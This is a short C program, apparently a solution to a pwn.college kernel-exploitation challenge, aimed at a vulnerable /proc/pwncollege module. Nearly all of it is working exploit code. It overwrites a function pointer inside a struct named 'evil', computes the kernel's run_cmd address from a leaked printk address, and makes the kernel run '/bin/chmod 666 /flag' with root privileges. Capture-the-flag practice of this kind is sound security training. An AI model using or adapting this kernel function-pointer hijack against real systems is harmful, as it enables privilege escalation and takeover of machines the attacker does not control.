#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <sys/ioctl.h>
#include <fcntl.h>
#include <unistd.h>

struct evil
{
  char buffer[256];
  int (*log_function)(const char *, ...);
} s;

int main() {
    int fd = open("/proc/pwncollege", O_WRONLY);
    memset(s.buffer, '0', 256);
    write(fd, &s, 256);
    uint64_t printk_addr;
    scanf("%llx", &printk_addr);
    s.log_function = printk_addr - 0xffffffffb90b69a9 + 0xffffffffb9089b30; // run_cmd
    printf("%llx\n", s.log_function);
    // run_cmd doesn't use stdin nor stdout. It also doesn't use current working directory. Its CWD is /. The executable should use absolute path.
    strcpy(s.buffer, "/bin/chmod 666 /flag");
    write(fd, &s, sizeof(struct evil) - 1);
}